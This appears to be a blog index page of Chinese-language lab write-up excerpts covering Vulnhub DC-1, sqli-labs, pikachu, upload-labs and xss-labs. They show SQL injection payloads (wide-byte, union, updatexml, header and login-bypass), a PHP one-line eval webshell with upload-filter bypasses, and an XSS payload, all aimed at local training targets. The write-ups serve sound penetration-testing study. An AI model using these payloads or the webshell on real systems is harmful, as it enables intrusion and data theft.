Vulnhub靶机DC系列-DC1
靶场介绍Name: DC: 1Date release: 28 Feb 2019Author: DCAUSeries: DCWeb page: http://www.five86.com/dc-1.html
描述DC-1 是一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。
它旨在为初学者带来挑战,但它的简单程度取决于您的技能和知识以及您的学习能力。
要成功完成这一挑战,您将需要 Linux 技能、熟悉 Linux 命令行以及使用基本渗透测试工具的经验,例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。
有多种获得 root 的方法,但是,我已经包含了一些包含初学者线索的标志。
总共有五个标志,但最终目标是在 root 的主目录中找到并读取标志。您甚至不需要成为 root 即可执行此操作,但是,您将需要 root 权限。
根据您的技能水平,您可能可以跳过查找大多数这些标志并直接获取根。
初学者可能会遇到他们以前从未遇到过的挑战,但谷歌搜索应该是获取完成这一挑战所需信息的全部内容。
技术信息DC-1 是基于 Debian 32 位构建的 ...
sql-labs靶场 32-65
宽字节123456宽字节: GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节,实际上只有两字节。宽字节带来的安全问题主要是ASCII字符(一字节)的现象,即将两个ascii字符误认为是一个宽字节字符。 中文、韩文、日文等均存在宽字节,英文默认都是一个字节。在使用PHP连接MySQL的时候,当设置“set character_set_client = gbk"时会导致一个编码转换的问题。例子: id= 1' 处理 1 \' 进行编码 1%5c%27 带入sql后 id = \'and XXXX 此时无法完成注入id=1%df' 处理 1%df\' 进行编码 1%df%5c%27 带入sql后 id =1運'and XXX 此时存在宽字节注入
Less-321234561. http://127.0.0.1/sqli/Less-32/?id=1 这个时候返回的是正常数据2. http://127.0 ...
sql-labs 26a-31
Less-26a1234567891. http://127.0.0.1/sqli/Less-26a/?id=1 返回数据正常2. http://127.0.0.1/sqli/Less-26a/?id=1' 此时没有数据返回3. http://127.0.0.1/sqli/Less-26a/?id=1') ;%00此时我们可以得到返回正常的数据4. 代码中 //print_r(mysql_error()); 屏蔽了返回的错误,所以这里我们不能使用报错注入。我们使用联合查询注入5. http://127.0.0.1/sqli/Less-26a/?id=111') %a0 union %a0 select %a0 1,2,3;%00 直接将所有的空格替换为%a0,根据hint得到可以回显的位置。(特别感谢网络上无偿提供搭建环境的人,感谢您的帮助)6. http://127.0.0.1/sqli/Less-26a/?id=111') %a0 union %a0 select %a0 1,2,group_concat(schema_name) % ...
pikachu-靶场
系统介绍12345678910111213141516171819Pikachu上的漏洞类型列表如下: Burt Force(暴力破解漏洞) XSS(跨站脚本漏洞) CSRF(跨站请求伪造) SQL-Inject(SQL注入漏洞) RCE(远程命令/代码执行) Files Inclusion(文件包含漏洞) Unsafe file downloads(不安全的文件下载) Unsafe file uploads(不安全的文件上传) Over Permisson(越权漏洞) ../../../(目录遍历) I can see your ABC(敏感信息泄露) PHP反序列化漏洞 XXE(XML External Entity attack) 不安全的URL重定向 SSRF(Server-Side Request Forgery) More...(找找看?..有彩蛋!) 管理工具里面提供了一个简易的xss管理后台,供你测试钓鱼和捞cookie~ 后续会持续更新一些新的漏洞进来,也欢迎你 ...
upload-labs
靶场地址1https://github.com/c0ny1/upload-labs
一句话1<?php @eval($_POST[123]);?>
WebShell连接工具中国蚁剑1https://github.com/AntSwordProject/antSword
AntSword 加载器1https://github.com/AntSwordProject/AntSword-Loader
菜刀Pass-01
写一个一句话文件,后缀改成允许上传的文件类型
bp抓包,把后缀改成.php
蚁剑连接Pass-02
新建后缀.php的文件
bp抓包
将Content-Type修改为允许上传的类型(image/jpeg、image/png、image/gif)三选一Pass-03
黑名单验证
如果黑名单定义不完整的话是可以实现绕过的,用.phtml .phps .php5 .pht进行绕过。这里我们直接上传一个.php5文件
因为上传上去的文件名会改变,bp抓包数据包中有回显,所以我们还是可以访问的。注意
要在apache的httpd.conf ...
XSS-labs
xss-labsxss-labs靶场的项目地址:https://github.com/do0dl3/xss-labs
level 1payload:
1http://xss/level1.php?name=<Script>alert(1)</Script>
level 2源码:
1234567891011121314151617181920212223242526<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><script>window.alert = function() { confirm("完成的不错!"); window.location.href="level3.php?writing=wait"; }& ...
sqli-labs靶场 23-26
参考crow: https://github.com/crow821/crowsec
Less-23
源码中对于 --+ # 进行了过滤处理, 所以这里我们只能使用and 或者or语句进行闭合,在这里可以使用另外一种特殊的注释符;%00通过这个注释符可以判断列数
除了在url末尾将–+、# --+ #替换为 ;%00 其余的均和less01关相同。第二种报错注入1http://127.0.0.1/sqli/Less-23/?id=1' and updatexml(1,concat(0x7e,(database())),1) or '1'='1 报错出数据库
1http://127.0.0.1/sqli/Less-23/?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 2,1)),1) or '1'='1 查询所有的数据库,使用limit进行逐个查询。
后续更换语句即可 ...
XSS跨站脚本
XSS跨站脚本
XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的恶意代码,当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。
XSS攻击是在网页中嵌入客户端恶意脚本代码,这些恶意代码一般是使用JavaScript语言编写的(也有使用ActionScript、.VBScript等客户端脚本语言编写的,但较为少见)。所以,如果想要深入研究XSS,必须要精通JavaScript。JavaScript能做到什么效果,XSS的威力就有多大。
JavaScript可以用来获取用户的Cookie、改变网页内容、URL调转,那么存在XSS漏洞的网站,就可以盗取用户Cookie、黑掉页面、导航到恶意网站,而攻击者需要做的仅仅是向Web页面中注入JavaScript代码。
主要分为三种类型:
反射型
存储型
DOM 型
XSS 危害
盗取 Cookie
盗取账户
恶意软件下载
键盘记录
钓鱼欺骗
XSS蠕虫
广告引流等等 JavaScript 能够写出的任意恶意功能
反射型
反射型XSS也被称为非持久性XSS,是现在最容易出现的一种XSS漏洞。当用 ...
sqli-labs靶场18-22
参考crow: https://github.com/crow821/crowsec
less - 18
http头注入
浏览器插件ModHeader
通过修改User-Agent: 的值进行注入
原 : User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
注入语句 : User-Agent: ' or updatexml(1,concat(0x7e,(database())),1) and '1'='1 (报错注入)
后续通过更改构造语句获得其他的信息1' or updatexml(1,concat(0x7e,构造语句)),1) and '1'='1
12345构造语句:查库: select schema_name from information_schema.schemata;查表: select table_name from information_schema ...
sqli-labs靶场11-17
参考crow: https://github.com/crow821/crowsec
Less-11
POST内容: uname=’ & passwd=1&submit=Submit 返回的结果显示你存在sql语法错误,证明存在注入漏洞。或这是直接在username中填写’,password中随便写判断一下是否存在注入漏洞。
直接在username中填写 admin’ or 1=1#(此处不能使用–+,因为–+主要使用在url中,#是适用的)即:
1uname=a' or 1=1 #& passwd=a &submit=Submit
此时登录成功,可以验证存在注入漏洞。3. 此时在password位置进行验证:
1uname=a&passwd=a' or 1=1# &submit=Submit
登录成功,开始构造!
同样可以进行判断,最后得出一共有两列。
1uname=a' order by 3#&passwd=a &submit=Submit ...